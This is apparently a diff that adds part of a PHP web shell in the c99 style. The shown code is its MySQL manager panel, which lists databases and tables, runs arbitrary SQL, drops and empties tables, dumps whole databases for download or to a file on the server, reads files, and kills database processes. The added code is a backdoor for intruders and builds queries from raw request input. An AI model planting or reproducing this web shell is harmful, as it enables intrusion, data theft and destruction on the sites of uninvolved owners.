+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php 
+   $result = mysql_list_tables($sql_db); 
+   if (!$result) {echo mysql_smarterror();} 
+   else 
+   { 
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; 
+    $c = 0; 
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>�&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} 
+    if (!$c) {echo "No tables found in database.";} 
+   } 
+  } 
+  else 
+  { 
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php 
+   $result = mysql_list_dbs($sql_sock); 
+   if (!$result) {echo mysql_smarterror();} 
+   else 
+   { 
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php 
+    $c = 0; 
+    $dbs = ""; 
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} 
+    echo "<option value=\"\">Databases (".$c.")</option>"; 
+    echo $dbs; 
+   } 
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php 
+  } 
+  //End left panel 
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; 
+  //Start center panel 
+  $diplay = TRUE; 
+  if ($sql_db) 
+  { 
+   if (!is_numeric($c)) {$c = 0;} 
+   if ($c == 0) {$c = "no";} 
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; 
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} 
+   echo "</b></center>"; 
+   $acts = array("","dump"); 
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} 
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} 
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} 
+   elseif ($sql_tbl_act == "insert") 
+   { 
+    if ($sql_tbl_insert_radio == 1) 
+    { 
+     $keys = ""; 
+     $akeys = array_keys($sql_tbl_insert); 
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} 
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} 
+     $values = ""; 
+     $i = 0; 
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} 
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} 
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; 
+     $sql_act = "query"; 
+     $sql_tbl_act = "browse"; 
+    } 
+    elseif ($sql_tbl_insert_radio == 2) 
+    { 
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); 
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; 
+     $result = mysql_query($sql_query) or print(mysql_smarterror()); 
+     $result = mysql_fetch_array($result, MYSQL_ASSOC); 
+     $sql_act = "query"; 
+     $sql_tbl_act = "browse"; 
+    } 
+   } 
+   if ($sql_act == "query") 
+   { 
+    echo "<hr size=\"1\" noshade>"; 
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} 
+   } 
+   if (in_array($sql_act,$acts)) 
+   { 
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php 
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} 
+    if ($sql_act == "newtbl") 
+    { 
+     echo "<b>"; 
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; 
+    } 
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
+   } 
+   elseif ($sql_act == "dump") 
+   { 
+    if (empty($submit)) 
+    { 
+     $diplay = FALSE; 
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; 
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; 
+     $v = join (";",$dmptbls); 
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; 
+     if ($dump_file) {$tmp = $dump_file;} 
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} 
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; 
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; 
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; 
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; 
+     echo "</form>"; 
+    } 
+    else 
+    { 
+     $diplay = TRUE; 
+     $set = array(); 
+     $set["sock"] = $sql_sock; 
+     $set["db"] = $sql_db; 
+     $dump_out = "download"; 
+     $set["print"] = 0; 
+     $set["nl2br"] = 0; 
+     $set[""] = 0; 
+     $set["file"] = $dump_file; 
+     $set["add_drop"] = TRUE; 
+     $set["onlytabs"] = array(); 
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} 
+     $ret = mysql_dump($set); 
+     if ($sql_dump_download) 
+     { 
+      @ob_clean(); 
+      header("Content-type: application/octet-stream"); 
+      header("Content-length: ".strlen($ret)); 
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); 
+      echo $ret; 
+      exit; 
+     } 
+     elseif ($sql_dump_savetofile) 
+     { 
+      $fp = fopen($sql_dump_file,"w"); 
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} 
+      else 
+      { 
+       fwrite($fp,$ret); 
+       fclose($fp); 
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; 
+      } 
+     } 
+     else {echo "<b>Dump: nothing to do!</b>";} 
+    } 
+   } 
+   if ($diplay) 
+   { 
+    if (!empty($sql_tbl)) 
+    { 
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} 
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); 
+     $count_row = mysql_fetch_array($count); 
+     mysql_free_result($count); 
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); 
+     $tbl_struct_fields = array(); 
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} 
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} 
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} 
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} 
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} 
+     $perpage = $sql_tbl_le - $sql_tbl_ls; 
+     if (!is_numeric($perpage)) {$perpage = 10;} 
+     $numpages = $count_row[0]/$perpage; 
+     $e = explode(" ",$sql_order); 
+     if (count($e) == 2) 
+     { 
+      if ($e[0] == "d") {$asc_desc = "DESC";} 
+      else {$asc_desc = "ASC";} 
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; 
+     } 
+     else {$v = "";} 
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; 
+     $result = mysql_query($query) or print(mysql_smarterror()); 
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} 
+     if ($sql_tbl_act == "insert") 
+     { 
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} 
+      if (!empty($sql_tbl_insert_radio)) 
+      { 
+
+      } 
+      else 
+      { 
+       echo "<br><br><b>Inserting row into table:</b><br>"; 
+       if (!empty($sql_tbl_insert_q)) 
+       { 
+        $sql_query = "SELECT * FROM `".$sql_tbl."`"; 
+        $sql_query .= " WHERE".$sql_tbl_insert_q; 
+        $sql_query .= " LIMIT 1;"; 
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); 
+        $values = mysql_fetch_assoc($result); 
+        mysql_free_result($result); 
+       } 
+       else {$values = array();} 
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; 
+       foreach ($tbl_struct_fields as $field) 
+       { 
+        $name = $field["Field"]; 
+        if (empty($sql_tbl_insert_q)) {$v = "";} 
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; 
+        $i++; 
+       } 
+       echo "</table><br>"; 
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; 
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} 
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; 
+      } 
+     } 
+     if ($sql_tbl_act == "browse") 
+     { 
+      $sql_tbl_ls = abs($sql_tbl_ls); 
+      $sql_tbl_le = abs($sql_tbl_le); 
+      echo "<hr size=\"1\" noshade>"; 
+      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;"; 
+      $b = 0; 
+      for($i=0;$i<$numpages;$i++) 
+      { 
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} 
+       echo $i; 
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} 
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} 
+       else {echo "&nbsp;";} 
+      } 
+      if ($i == 0) {echo "empty";} 
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>"; 
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>"; 
+      echo "<tr>"; 
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; 
+      for ($i=0;$i<mysql_num_fields($result);$i++) 
+      { 
+       $v = mysql_field_name($result,$i); 
+       if ($e[0] == "a") {$s = "d"; $m = "asc";} 
+       else {$s = "a"; $m = "desc";} 
+       echo "<td>"; 
+       if (empty($e[0])) {$e[0] = "a";} 
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} 
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";} 
+       echo "</td>"; 
+      } 
+      echo "<td><font color=\"green\"><b>Action</b></font></td>"; 
+      echo "</tr>"; 
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
+      { 
+       echo "<tr>"; 
+       $w = ""; 
+       $i = 0; 
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} 
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} 
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; 
+       $i = 0; 
+       foreach ($row as $k=>$v) 
+       { 
+        $v = htmlspecialchars($v); 
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";} 
+        echo "<td>".$v."</td>"; 
+        $i++; 
+       } 
+       echo "<td>"; 
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;"; 
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;"; 
+       echo "</td>"; 
+       echo "</tr>"; 
+      } 
+      mysql_free_result($result); 
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
+      echo "<option value=\"\">With selected:</option>"; 
+      echo "<option value=\"deleterow\">Delete</option>"; 
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
+     } 
+    } 
+    else 
+    { 
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock); 
+     if (!$result) {echo mysql_smarterror();} 
+     else 
+     { 
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; 
+      $i = 0; 
+      $tsize = $trows = 0; 
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
+      { 
+       $tsize += $row["Data_length"]; 
+       $trows += $row["Rows"]; 
+       $size = view_size($row["Data_length"]); 
+       echo "<tr>"; 
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; 
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>"; 
+       echo "<td>".$row["Rows"]."</td>"; 
+       echo "<td>".$row["Type"]."</td>"; 
+       echo "<td>".$row["Create_time"]."</td>"; 
+       echo "<td>".$row["Update_time"]."</td>"; 
+       echo "<td>".$size."</td>"; 
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>"; 
+       echo "</tr>"; 
+       $i++; 
+      } 
+      echo "<tr bgcolor=\"000000\">"; 
+      echo "<td><center><b>�</b></center></td>"; 
+      echo "<td><center><b>".$i." table(s)</b></center></td>"; 
+      echo "<td><b>".$trows."</b></td>"; 
+      echo "<td>".$row[1]."</td>"; 
+      echo "<td>".$row[10]."</td>"; 
+      echo "<td>".$row[11]."</td>"; 
+      echo "<td><b>".view_size($tsize)."</b></td>"; 
+      echo "<td></td>"; 
+      echo "</tr>"; 
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
+      echo "<option value=\"\">With selected:</option>"; 
+      echo "<option value=\"tbldrop\">Drop</option>"; 
+      echo "<option value=\"tblempty\">Empty</option>"; 
+      echo "<option value=\"tbldump\">Dump</option>"; 
+      echo "<option value=\"tblcheck\">Check table</option>"; 
+      echo "<option value=\"tbloptimize\">Optimize table</option>"; 
+      echo "<option value=\"tblrepair\">Repair table</option>"; 
+      echo "<option value=\"tblanalyze\">Analyze table</option>"; 
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
+      mysql_free_result($result); 
+     } 
+    } 
+   } 
+   } 
+  } 
+  else 
+  { 
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile"); 
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } 
+   if (!empty($sql_act)) 
+   { 
+    echo "<hr size=\"1\" noshade>"; 
+    if ($sql_act == "newdb") 
+    { 
+     echo "<b>"; 
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} 
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
+    } 
+    if ($sql_act == "serverstatus") 
+    { 
+     $result = mysql_query("SHOW STATUS", $sql_sock); 
+     echo "<center><b>Server-status variables:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table></center>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "servervars") 
+    { 
+     $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+     echo "<center><b>Server variables:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "processes") 
+    { 
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} 
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+     echo "<center><b>Processes:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; 
